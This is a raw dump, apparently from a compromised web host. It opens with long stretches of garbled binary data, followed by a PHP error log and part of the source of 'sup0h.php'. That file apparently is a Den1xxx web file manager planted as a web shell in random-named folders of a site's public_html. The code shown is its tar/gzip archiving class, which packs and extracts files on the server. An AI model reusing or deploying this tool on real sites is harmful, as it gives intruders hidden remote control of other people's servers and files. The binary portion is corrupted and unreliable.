dx1(z2.=a0?v`8]S뭴Zt%N-L#xLZ W5V`VkQ%^`Bo]De yX{3CANrZcWE16iϓd4}X)*q<\w:/K ФvYE&1kqճ}Z=uMGm-݇V*RRlhR dDYOJa=zeURCQʤKJ:]`[BJOΰIEndZ4,IgP8 R#46\jTyJ7" ggm]N3tOg>5i 8&E9\iT1}ҍFqnTړ][^Na\L '4+`f_;Xط[vɮI 7 dS?w 9ޕ7RjmPUpR qO=>n^P NdD+},'(6K^ܳmI9ir#qkD!SFce;N}ʭ ެrVy Z712jǂi=suWʹ<%_XӇE1e_|K|+O}Ւ}L V)mujN%1Wm#>;\kkAYIp SM,m=^LLvftVa1yjӇ؈TDٯn M2vT*BjPJ?wrxPUNg҄e<(e:JW<;EY$yVu-jGOv_Vj˃@]>Dlo^+O["&jmzL𩯆&jVV~`z=*.XR= j"CMݟ‘&T*P6%,D{Vywvj=4KZc+q<"` HI=e93zj ↥_"DW\=ZnKhOR"hG1BgK@톢KO v;Oka:ZA>+z3pXrq9)ڽڬ Op0T 㤷@◕rl ׋.z:pJ`9,]P~lZ0yYVBp]<ӎr^~N8P::l,cbu*֗NS`WϽ^k`pKHmmZ Vؖ!+uԝy>幇v/wܲ<-e?*NֶHViq\ljF2G(V(saiUyՌ=|תj72yymFÊ/bV^9wg׍}G.V+Ng}5;yYu1;A=R)Ć^[+FbY-~)˝ԭr GnǏRxΗnz`i괢cſe҉r9Jtu2n~oO` L zUAj|oQRA>290 fxǦmrnQ~ V{.•hώ] $σrd\)UֱI*[+ >7~JQzڭNlXţjTjT^s"`BƚcD97l@VhWvO㼆0Nu,mjlj֓V(Q\SɄ=lZ}#xRx*A)9ŧTgz.>Y,XC}U/V#YcjbلGI'v-2.ͮfٸڬhO9{|~9^g5Q M#J-\Wߩb) ͉=G/f 4Uw$TnCzGBvKl~,ǝX[7TbEEw3Y.‰q$=R"ָj&+gdA{lFyt]=e no]on~uoG;A+)v jwZlwNuV=-$'BϣSK{5q1R[%:T%X"H.V'nQ6i v"WD^5THII4©\;c8pegZ6A!7v&ť\T+E y&Z.3Si11Uz\+4o/YZS(osDM㧎q`HÄ͇Cp"<"x\H/rC_-BotwnxivꕂGuyW*xyl%).ǨT¬Tq1źZCCd* zh26EyzH=h[ڏ}诶9J@dQ̎tDL2fN廩}!狝<ܗ#Graݳ'>J 'ӾdC)yN>aqEm*?/:1>Ag>rN".UUad=@( 'H1Ճ܋! GA J{[UA~VzH[FRge:*B8(B(Sl(FSҡNsQLWv l}kDeG3[Pw^??Ƭ`lcJ_fC\e bW=ʓetx4mDy>EĮ뛐t" F8H*5=Oi.>nֳ:Ń P"l&P.=*ԗRոzh*RuYxyf-<)G}">ć?b()eX~أDAO\ee94 vn`\pl<5"AA$ *Pn=(jʴRt&ҝ@Ikf@Z"[|lNNstDX6ӜWR$)W*̞X&X`+@L4YG/466gC5`~߯BB7ӏ ;bۈ X+ۥ|e(uZ]?=턅AIM+ru;?L&cO/U$R&\/!{*J>eПz&i+Mp|Zpl>y/i1 gHNLh3L ֭@W! %P/frΔ94zj JB*4k B 5-aYC\a ~?xX׳.V6u%-!H+Y^:ȩҁib}!Q1_K5۝jŤaGǨC%O޵vē6/wnlޱxQh_ d3=pX9Vڙo8UꞐU[I 8{~qf=WJB^WYU2!J^p}L^Eut|ZN?tM.]~/Hh;5)r9W]O[Rs4V#>|BrtBPD["J)Iqn1hBB ;N=F 1Z ]A"0z`0PgÈ Paf݅:!sOCGAp$[SPG5wL ֯YY< ^N ھ%PRjkQPp;4C>pcA -7[VK.{2x\t_[%ɝjKTJFmܹ򮠆f Kzo=4CnYJcRSqO߳qF ]J~<3[P /<m(YQD߉YF|ѲLYA$v y. ۏEPއQ4WYuKhא5v1l^H]WNIz$.z}3/e{p+X;t{mIǺ)E|*}{kJTWFM.Oߐߖ)G=eAo l#鞡 2j idP P#hg,KQl2E5adw}qʛ /?;=nf1ӽC47xp! X%͚*ţ SҢf2eŠ?al'[e nºpCuC{ACfCN*4ZSqs×7,+إ-H8ZQ 5 BF09$ڈk,\hЃ=%5k]2>rM>5msɖ&L4ATS Gǔ X HIlP!""dao'/qg#f8qu ˼:i H|M\ %)w`" {7jǍXKdCcJ 46n'A^*- uNn$'/z>B+\!S7X9}э{RTs,̀/Ώw tm(k l4=%|z4N" ʓnE[i2=z, c8$J*fWeO^+L<4| Gb0A9<.(_ P,`?I^w!tlN_YѮ#LK#`|;^Ͻ hH'q3ց9`'-8jw2C^pTJ㝞$'C 9d%<̀Mxtoӧ3KՍk yY6p0Abɐ8!Bup\0Bl!̱0c.JFX߉d6@HI$Rh a@*38ǩrYր&wa^rhIhcP@^^!cW,Zn@ 0[0B:H/Wx2ߊ5p5hqdƟ2N5ig׮sڈƏO{C`qhȗ(hD|10s=:147;tAt9쥹 G9Cp:ٞ|c>ƑL%cY̨߰I8z|M4Ux_Ϥ~D"S{ x/rN3FѸ{pqhSo| 6s:pk_q}d29U$$!xcP%"[]:BK~:K>ewvȀ | P˗SnT[ؓ*ck~"+L_dٸjrw+ !r9/bکsJE< 0:仓#zr~eSәig\lb}3H:{ao bNY[g:=^&(˂^Daa|zTmTQG8qYZւ8+"OO)ö]ڬ@l*!sL2 AiM g|#_#zCʁJ^vW$c~r~DAq=N>n~M|i/w8MW|vBu}6&wO:\Lu,8i p)"X4;#Z_Z ,k~o,hX*m0_ʃҗ{mئ_% OhН:LpՌ=ի_d 7ϲX\" 2-2o\[;(pΗF.~D>sx7JNoReV IzvuY6Jܛ,y1ǒ9ZЦI. faKm鲺Ɲ= E%F{k6;5NL߫*ac .{b} KG#)0A{ +NCh9 sJX"oBhDŽyn?l>e>ހC8mė>)ihk'7NԊn~rP\NZdH #[{vЭZW#pe?%k;J?IŧMza6!1o׵+9ۚݦ F^ ZߙGO%uҼ<屣iy."W)pB' M_gzY{ F8o?dkQa@ Jbnتq_ I|iB;F~̐{ |g,[Tc_ѿT~4>㿳3>^8rH :"qK<[Ȓ7?, yA|V}d9^([ 4B}呖qqr/Fu͵h_J9ާ`N/2Dk|^gy|q/2tNjlWY>B!;UkCN#H OjxzvK&V_ Vv@I˨XcQOoW۬=.>'C5<8OSyb)8Q,wfa9>LCJߛu gq`ePh5%w|Li:C3/R#mQ&,50!U"N|C2dG3O&s|qR 5Ö%3DA⋩0.RS_$c_aH"9L/ inua0`^0@;^'$>mONa Vm8AoBAVFևeQEBLQj.~q.zV DBM~/4d<" ç}5U&dNxQUxn'4bw Hڳ?"Ge~t.Z90/ br#:;>CR8-4s `l-)KJ2Bjl'aCdZ{[| k/EK,@]MvE!~}7Z20C!"JG>$ +䗓n=7('?&DjXwk%NLNH`DsUwc|Gߟ8FKY|$V_o0-?=cS{s[uFz%^t[pE;M@U' pu9z7p+ܪ /}Agy}1fÇSоxhҺAp<>,[=筮%j  id҇PAk$umpt;IEeʠ,u%>pӯ+ H #dsCT~TkFt{}n0TŅ$/W7G0 . p{yAypw }~P^"0GfCdh;1=]e!\yƙ{f$DT(`8!buw ҃w̐GǏLݹ.KM SD + ₇)J6o@"3m0A7NIPd(I@P-?jqE֓FRHOIAVH i! I27rOQY#DA`@((sϬ(A%dZQRZC~y3qE/㯤  HQB(&gW$WO6Z$)T!йO0U1lɘ/fϥrY %׊}KBA2(rҁPUS~7X"Qv[y<DG~50 7n}ېOV&l6r#GR6:ps- rLGsҕ@v4 R*cI?4 $e ++(Hҡb ul3}b-D-7 mQN%qMX_CmjmL[2hNcdu0[$$O>& 5!R2_>~A8Ҩ'Kirfb$"Z$>(~A:odftF2nS/rɇ̈gK cN\3%n#L8MV|55A#tg\f!r]ur<59Aڼǒ%31}0{ >Ŷߔ͗@ecgj/ڝ+ԩKuWf/!:zg tDS8su0HLwA|4{gfFF# v"x֐"/K*dn}PÅ ?a{C}6[޺:q+8n-RwlHȪ-QP  # epXQ:H~A(4#:|:2'n.t]L`^Ovq1~ʩzVA 3f仙kR 2F, ?@["Gv3:6n}66pgyƠfu2oGt{3̼X:ݺm: " ;ej\nL '4 s&rm"@++ t"HjATtq_D M{~i}{7|=XǼ uY(e"/EL Gc\ST Zrù!X%iL-t8 x.KmKwj;{g; &zcR=//s-naK3d۪ό.T,rMzgSvuZչfSS<`ߤ\ϲL= <-1\]TPG/^{e9urcja^fG׫^:-۪uWm_0݃*YdOZ34xiN_&>Nc0K/c.Ǔ0/ؗ` d3zN9,ɿ- ƊMN]+"E4rU#c%--%qY~:ya;w읦kӶά7 Cd|,n*XJdָepZt J7 /[t:bwWnKKaƻ4nI@F#Wmg"xnݓHǤmPXj$#mi|-|fIJPqQ_ |'W޷SǍ|?Qi.j֔meH4H{YvXϥnQs'l&\&+ؗ먎(KK=~`l%L 9psn0cs^rku=Yأo͘[.y]״/#M7.XiA }PH_|VdXn13QX+(0Xb]R@=ZXkstRffR(=77zW.3.ST'a]mҐ` %= \@w7?nr9},u͟ Cm˝F {1A}0Pɝsv7BoEfNY0EnB ܿ MQF”Y[atb&(ʲb'.XH2a>2MA̠姄3Ʃ.|KA)0c9u$~OԢ2Z=5-X<~τ{) HңEFkY؀bIbMeWEHr\ھ X =텾 ;J.潃F$,K  NضQs=WP}6mxnz X8Ӟ!6(_s}U~ @z1H7ikF'tG2GmL[g8wi^_=JƸ@;KSon^MV}sE^]Ye4Yn`ů wPrώ2ه2@IT: Խ7_YjCT=F+/cNJq_8\h/]; LjF0PJLJgP﷦V~B)u&?ߨo;`Pre*U$ΫݽgP׷<3' B$rAD\2Vno 3x{!33`=H`{!aY,Y GC4~A-eĶXn"KE@@ h]B.衱2wV Mտ*2Lk|eE @Ѕ&A^:ޙ-Ơu6[ 6nǔ¢3 p ,\mv[NjV 07z0K7WH}(|]n0 ?QBJ~gxDO,$Gp.75ԧ1gu:=NsDŽq؛w *"ѿ*dCPsL^U063'[{@={-'/p\zXZS 62۔3Bext^ [v-я{iC%,l.M }_.;zرп)lbFbPWsVzpS >,u;Y:|s{K"8ZϣU8xz;H->@D8r܇SwDڀ/n|3$:aA{M :1td\, 28~_TjrXKEf0>hqC]Hw5n8gt7h% {5Xª]]2߭zN7`F!}N &'u*koHd˶a'͍m=Zyz-vwg30_afkCkyw뼶oY! p h[wh1}{b(O?&R<error_log000064400000020774151032666610006501 0ustar00[05-Nov-2025 19:41:54 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 02:36:26 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 04:26:30 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 05:38:55 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 06:10:11 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 06:10:43 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 06:10:43 UTC] PHP Notice: Undefined variable: ext in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 1115 [06-Nov-2025 06:32:03 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 07:09:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 07:09:16 UTC] PHP Fatal error: Uncaught BadMethodCallException: phar "/home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php.php.tar.gz" exists and must be unlinked prior to conversion in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php:1115 Stack trace: #0 /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php(1115): PharData->compress(4096, 'php.tar.gz') #1 {main} thrown in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 1115 [06-Nov-2025 08:46:48 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 08:46:51 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 10:27:52 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 10:56:10 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 10:56:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 10:57:13 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 13:26:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 13:26:30 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 13:58:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 14:56:26 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 16:16:16 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 17:25:56 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 18:52:03 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 20:24:18 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 23:08:21 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [06-Nov-2025 23:59:22 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:29:01 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:53:07 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:53:23 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:55:13 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 [07-Nov-2025 03:55:29 UTC] PHP Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php on line 88 sup0h.php.tar000064400000236000151032666610007110 0ustar00home/gettoplisting/public_html/dd7e5a/h6snx5/sup0h.php000064400000232747151030446340016665 0ustar00<\/script>\r\n errors)) $this->errors = array(); } function createArchive($file_list){ $result = false; if (file_exists($this->archive_name) && is_file($this->archive_name)) $newArchive = false; else $newArchive = true; if ($newArchive){ if (!$this->openWrite()) return false; } else { if (filesize($this->archive_name) == 0) return $this->openWrite(); if ($this->isGzipped) { $this->closeTmpFile(); if (!rename($this->archive_name, $this->archive_name.'.tmp')){ $this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp'; return false; } $tmpArchive = gzopen($this->archive_name.'.tmp', 'rb'); if (!$tmpArchive){ $this->errors[] = $this->archive_name.'.tmp '.__('is not readable'); rename($this->archive_name.'.tmp', $this->archive_name); return false; } if (!$this->openWrite()){ rename($this->archive_name.'.tmp', $this->archive_name); return false; } $buffer = gzread($tmpArchive, 512); if (!gzeof($tmpArchive)){ do { $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); $buffer = gzread($tmpArchive, 512); } while (!gzeof($tmpArchive)); } gzclose($tmpArchive); unlink($this->archive_name.'.tmp'); } else { $this->tmp_file = fopen($this->archive_name, 'r+b'); if (!$this->tmp_file) return false; } } if (isset($file_list) && is_array($file_list)) { if (count($file_list)>0) $result = $this->packFileArray($file_list); } else $this->errors[] = __('No file').__(' to ').__('Archive'); if (($result)&&(is_resource($this->tmp_file))){ $binaryData = pack('a512', ''); $this->writeBlock($binaryData); } $this->closeTmpFile(); if ($newArchive && !$result){ $this->closeTmpFile(); unlink($this->archive_name); } return $result; } function restoreArchive($path){ $fileName = $this->archive_name; if (!$this->isGzipped){ if (file_exists($fileName)){ if ($fp = fopen($fileName, 'rb')){ $data = fread($fp, 2); fclose($fp); if ($data == '\37\213'){ $this->isGzipped = true; } } } elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true; } $result = true; if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb'); else $this->tmp_file = fopen($fileName, 'rb'); if (!$this->tmp_file){ $this->errors[] = $fileName.' '.__('is not readable'); return false; } $result = $this->unpackFileArray($path); $this->closeTmpFile(); return $result; } function showErrors ($message = '') { $Errors = $this->errors; if(count($Errors)>0) { if (!empty($message)) $message = ' ('.$message.')'; $message = __('Error occurred').$message.':
'; foreach ($Errors as $value) $message .= $value.'
'; return $message; } else return ''; } function packFileArray($file_array){ $result = true; if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (!is_array($file_array) || count($file_array)<=0) return true; for ($i = 0; $iarchive_name) continue; if (strlen($filename)<=0) continue; if (!file_exists($filename)){ $this->errors[] = __('No file').' '.$filename; continue; } if (!$this->tmp_file){ $this->errors[] = __('Invalid file descriptor'); return false; } if (strlen($filename)<=0){ $this->errors[] = __('Filename').' '.__('is incorrect');; return false; } $filename = str_replace('\\', '/', $filename); $keep_filename = $this->makeGoodPath($filename); if (is_file($filename)){ if (($file = fopen($filename, 'rb')) == 0){ $this->errors[] = __('Mode ').__('is incorrect'); } if(($this->file_pos == 0)){ if(!$this->writeHeader($filename, $keep_filename)) return false; } while (($buffer = fread($file, 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } fclose($file); } else $this->writeHeader($filename, $keep_filename); if (@is_dir($filename)){ if (!($handle = opendir($filename))){ $this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable'); continue; } while (false !== ($dir = readdir($handle))){ if ($dir!='.' && $dir!='..'){ $file_array_tmp = array(); if ($filename != '.') $file_array_tmp[] = $filename.'/'.$dir; else $file_array_tmp[] = $dir; $result = $this->packFileArray($file_array_tmp); } } unset($file_array_tmp); unset($dir); unset($handle); } } return $result; } function unpackFileArray($path){ $path = str_replace('\\', '/', $path); if ($path == '' || (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':'))) $path = './'.$path; clearstatcache(); while (strlen($binaryData = $this->readBlock()) != 0){ if (!$this->readHeader($binaryData, $header)) return false; if ($header['filename'] == '') continue; if ($header['typeflag'] == 'L'){ //reading long header $filename = ''; $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++){ $content = $this->readBlock(); $filename .= $content; } if (($laspiece = $header['size'] % 512) != 0){ $content = $this->readBlock(); $filename .= substr($content, 0, $laspiece); } $binaryData = $this->readBlock(); if (!$this->readHeader($binaryData, $header)) return false; else $header['filename'] = $filename; return true; } if (($path != './') && ($path != '/')){ while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1); if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename']; else $header['filename'] = $path.'/'.$header['filename']; } if (file_exists($header['filename'])){ if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){ $this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder'); return false; } if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){ $this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists'); return false; } if (!is_writeable($header['filename'])){ $this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists'); return false; } } elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){ $this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename']; return false; } if ($header['typeflag'] == '5'){ if (!file_exists($header['filename'])) { if (!mkdir($header['filename'], 0777)) { $this->errors[] = __('Cannot create directory').' '.$header['filename']; return false; } } } else { if (($destination = fopen($header['filename'], 'wb')) == 0) { $this->errors[] = __('Cannot write to file').' '.$header['filename']; return false; } else { $decr = floor($header['size']/512); for ($i = 0; $i < $decr; $i++) { $content = $this->readBlock(); fwrite($destination, $content, 512); } if (($header['size'] % 512) != 0) { $content = $this->readBlock(); fwrite($destination, $content, ($header['size'] % 512)); } fclose($destination); touch($header['filename'], $header['time']); } clearstatcache(); if (filesize($header['filename']) != $header['size']) { $this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect'); return false; } } if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = ''; if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/'; $this->dirs[] = $file_dir; $this->files[] = $header['filename']; } return true; } function dirCheck($dir){ $parent_dir = dirname($dir); if ((@is_dir($dir)) or ($dir == '')) return true; if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir))) return false; if (!mkdir($dir, 0777)){ $this->errors[] = __('Cannot create directory').' '.$dir; return false; } return true; } function readHeader($binaryData, &$header){ if (strlen($binaryData)==0){ $header['filename'] = ''; return true; } if (strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, 